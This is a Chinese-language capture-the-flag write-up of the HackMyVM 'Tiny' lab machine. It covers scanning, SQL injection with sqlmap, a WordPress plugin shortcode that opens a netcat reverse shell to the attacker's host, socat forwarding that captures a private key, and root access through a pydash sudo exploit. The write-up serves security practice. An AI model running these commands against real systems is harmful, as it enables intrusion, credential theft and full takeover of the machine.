打靶记录(八二)之HMVTiny

主机发现

sudo nmap -sn 192.168.56.0/24

192.168.56.101是靶机IP

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.101
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-02 07:22 UTC
Nmap scan report for 192.168.56.101 (192.168.56.101)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8888/tcp open  sun-answerbook
MAC Address: 08:00:27:A2:36:11 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.50 seconds

sudo nmap -sT -sV -sC -O -p22,80,8888 192.168.56.101
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-02 07:23 UTC
Nmap scan report for 192.168.56.101 (192.168.56.101)
Host is up (0.00038s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_  256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
80/tcp   open  http       Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Blog
| http-robots.txt: 15 disallowed entries 
| /wp-admin/ /cgi-bin/ /private/ /temp/ /backup/ /old/ 
| /test/ /dev/ / /misc/ /downloads/ /doc/ /documents/ 
|_/restricted/ /confidential/
|_http-generator: WordPress 6.3.1
8888/tcp open  http-proxy tinyproxy 1.11.1
|_http-server-header: tinyproxy/1.11.1
|_http-title: 403 Access denied
MAC Address: 08:00:27:A2:36:11 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.51 seconds

sudo nmap --script=vuln -p22,80,8888 192.168.56.101            
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-02 07:24 UTC
Nmap scan report for 192.168.56.101 (192.168.56.101)
Host is up (0.00028s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.101
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.101:80/
|     Form id: wp-block-search__input-1
|_    Form action: http://tiny.hmv/
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /robots.txt: Robots file
|   /readme.html: Wordpress version: 2 
|   /: WordPress version: 6.3.1
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
8888/tcp open  sun-answerbook
MAC Address: 08:00:27:A2:36:11 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.13 seconds

hosts添加tiny.hmv

试着扫一下子域名

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://tiny.hmv' -H 'HOST:FUZZ.tiny.hmv' -fs 24129

存在一个wish.tiny.hmv

Web

8888端口似乎是一个代理？访问显示被拒绝，似乎需要代理才能访问？tinyproxy version 1.11.1

访问80端口的web服务，是一个wordpress框架，扫一下目录，没什么特别的发现吧，登陆界面也没什么操作空间。

访问wish.tiny.hmv,是一个类似留言界面的东西，可以抓包。输入一些sql注入的语句会得到奇怪的回应。

用sqlmap跑一下

sqlmap -r sql.txt --batch --level 5 --dump

得到凭据:umeko/fuckit!

成功登录进wordpress

Getshell

然而似乎没有权限来写马getshell，看看有没有能利用的插件主题漏洞？

wpscan --url http://tiny.hmv/ --enumerate ap --plugins-detection aggressive --api-token=自己的api-token

找到一个不需要管理员权限就能利用的插件RCE漏洞:OpenHook，看上去是一个很新的CVE，可以执行PHP代码

我们需要在管理界面左侧的add new来新增帖子，点击左上方加号，找到shortcode,添加

写上:

[php]
<?php system('nc -e /bin/bash 192.168.56.102 1234') ?>
[/php]

并在右侧把author作者改成admin,然后右上角publish发表

开启监听，访问刚刚发布的贴子，成功getshell

横向移动

把shell转移到msfpreter

还有一位叫做vic的用户，但是暂时没有权限

以及找到WP的数据库凭证，但是是我们已经获取了的信息

define( 'DB_NAME', 'wordpressdb' );
define( 'DB_USER', 'wordpressuser' );
define( 'DB_PASSWORD', '6rt443RKhwTXjWDe' );
define( 'DB_HOST', 'localhost' );

ss -tlnp
State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*          
LISTEN 0      511        127.0.0.1:8000      0.0.0.0:*          
LISTEN 0      1024         0.0.0.0:8888      0.0.0.0:*          
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*          
LISTEN 0      1024            [::]:8888         [::]:*          
LISTEN 0      128             [::]:22           [::]:*          
LISTEN 0      511                *:80              *:*  

发现有开一个8000本地的端口,用socat端口转发

./socat tcp-listen:10000,reuseaddr,fork tcp:127.0.0.1:8000

访问10000端口发现需要登录，似乎是一个Web服务？

上传一个pspy查看进程,发现在后台运行着tinyproxy，查看配置文件

cat /etc/tinyproxy/tinyproxy.conf

发现其将服务的请求转发到1111端口，

nc -lvnp 1111

然后得到了一个对8000端口的请求,似乎存在一个私钥。也就是说:tinyproxy会自动请求8000端口服务的私钥，然后将请求的response发送到1111端口？试着将8000端口转发到1111端口，并且-v参数开启详细模式，就能够捕获到私钥

./socat -v TCP-LISTEN:1111,reuseaddr,fork TCP:127.0.0.1:8000

得到私钥后复制到kali，赋予权限后连接vic用户

提权

发现能够无需密码地以root身份执行/opt/car.py*

本想在这个目录创建一个类似于car.py1.py的反弹shell来提权，但是发现在这个目录没有权限

那就查看car.py的内容，大致是用了pydash这个库的函数来调用对象的类方法，pydash.objects.invoke函数存在漏洞

https://security.snyk.io/vuln/SNYK-PYTHON-PYDASH-5916518

sudo /usr/bin/python3 /opt/car.py __init__.__globals__.random._os.system /bin/bash

现在我们是root!

碎碎念

打的第一个hackmyvm的靶机，选取了一个hard难度的，确实也不算太容易，一开始的WP的漏洞插件，到后面的内网横向到提权，每一步都稍微带点难度，挺有趣的